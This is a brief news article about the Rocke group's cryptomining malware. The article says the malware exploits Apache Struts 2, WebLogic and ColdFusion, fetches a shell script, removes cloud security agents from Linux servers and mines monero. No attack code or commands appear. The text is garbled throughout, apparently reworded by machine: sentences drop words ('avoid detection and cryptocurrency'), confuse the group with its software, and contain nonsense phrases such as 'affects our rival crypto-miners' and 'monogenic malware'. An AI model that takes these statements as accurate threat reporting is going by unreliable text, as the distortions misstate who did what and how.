A form of recently observed malware uses a new trick to avoid detection and cryptocurrency on cloud servers.
Two researchers, Xingyu Jin and Claud Xiao, of the computer security company Palo Alto Networks, released a report on Thursday, stating that a bad piece of bad actors software dubbed the Rocke group is targeting the public cloud infrastructure . Once downloaded, you need administrative control to first uninstall cloud security products and then inject the code that extracts the cryptocurrency monero.
The researchers found that Rocke malware injected code to uninstall five different cloud security products from infected Linux servers, including offers from leading Chinese cloud providers, Alibaba and Tencent. By adding insult to injury, the malware follows the uninstallation steps defined in the product user manuals.
To do its malevolent work, the Rocke group exploits the vulnerabilities in the Apache Struts 2, Oracle WebLogic and Adobe ColdFusion applications, and then downloads a shell script called "a7". This affects our rival crypto-miners and hides the signs of its presence, as well as how to disable security programs.
The researchers add:
"To our knowledge, this is the first malware family that has developed the unique ability to detect and remove cloud security products."
The malware of the Rocke group was the first discovered from Cisco's IT giant, Talos Intelligence Group, in August. At the time Talos researcher David Liebenberg said that Rocke "will continue to exploit the Git repositories to download and perform illicit mining on victim machines".
Back in November, research by Israel-based information security company Check Point Software Technologies showed that monogenic malware was dubbed KingMiner, it is evolving over time to avoid detection.
Monero remains by far the most popular cryptocurrency among hackers. Last week, a study conducted by college researchers showed that hackers have at least mined 4.32 percent of the total monero in circulation.
A McAfee study, published in December, showed that cryptocurrency malware threats have grown further 4,000 percent last year.
Malware image through Shutterstock